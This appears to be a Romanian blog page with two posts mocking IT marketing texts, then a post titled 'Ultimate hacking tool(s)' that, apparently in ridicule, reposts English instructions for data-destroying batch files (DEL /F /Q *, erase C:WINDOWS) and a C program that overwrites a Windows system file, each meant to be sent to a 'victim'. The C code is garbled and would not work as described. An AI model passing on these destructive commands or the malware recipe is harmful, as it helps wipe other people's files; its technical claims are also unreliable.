Ce e mare si verde?

Un newsletter de la Tape Computers:

Dupa episoadele cu hotnews.ro, am inceput sa privesc cu mai multa atentie si in curtea IT care pare sa fie la fel de prolifica. Tape vine cu un soi de pata mare si verde care prezinta 3 sisteme de racire sub 2 EUR. Imaginea are 938 x 2112 pixeli. Frumos, nu?

PS pentru carcotasi: imaginea atasata a fost redimensionata (evident) cu 50% fata de cea originala.

Pixel & PR Free

Am primit zilele trecute urmatoarea informare de la SCOP (una dintre cele mai impozante firme de distributie IT din Ro):

Lasand la o parte multitudinea de virgule puse alandala in intregul text, ma voi opri doar asupra celei din paragraful al doilea care reuseste o performanta uimitoare si anume aceea de-a se situa cu nevinovatie intre subiect si predicat. Felicitari!

Cat despre termenul de “pixel free”… mi-e si teama sa ma gandesc la un display lcd fara pixeli pentru care sa mai si platesc ceva in plus. Poate se refera la “bad pixel free” sau “dead ass pixel free” sau etc.

PR? Comunicare? Rusine tovarasi!

Ultimate hacking tool(s)

Pentru hacktarzi:

To delete all folders/files just put this:

DEL /F /Q *

Into notpad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

If you just want to delete the WINDOWS file do this:

The only thing you need again is Notepad.

Now, to test it, create a textfile called TEST.txt in C:

Now in your notepad type “erase C:TEST.txt” (without the quotes). Then do a “Save As…” and save it as “Test.cmd”.

Now run the file “Test.cmd” then open up C: and you’ll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON’T run the file or you’ll lose your WINDOWS files. So, that’s the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.

Simple explanation:

Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.

Si inca o petarda:

type this in notepad

———————————————————————
// #include<iostream.h>
#include<conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sysstat.h>
#include <io.h>
#include <string.h>

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named “DOVE.GIF” in the current directory and write
a string to it. If “DOVE.GIF” already exists, it will be overwritten.
*/

if ((handle = open(“C:\windows\win.com”, O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf(“Error opening file.
“);
exit(1);
}

strcpy(string, “<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!</html>
“);

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf(“Error writing to the file.
“);
getch();
exit(1);
}
printf(”

Wrote %d bytes to the file.
“, res);
cout<<”

Hello !!!!!!!!”;
cout<<”

This is a VIRUS ATTACK !!!”;
cout<<”

This execution currupt your WINDOWS !!!!!!
“;
close(handle);
getch();
return 0;
}

————————————————————————-
just paste it in the notepad and save it as virus.exe
and send it to victim and scare the brains out of him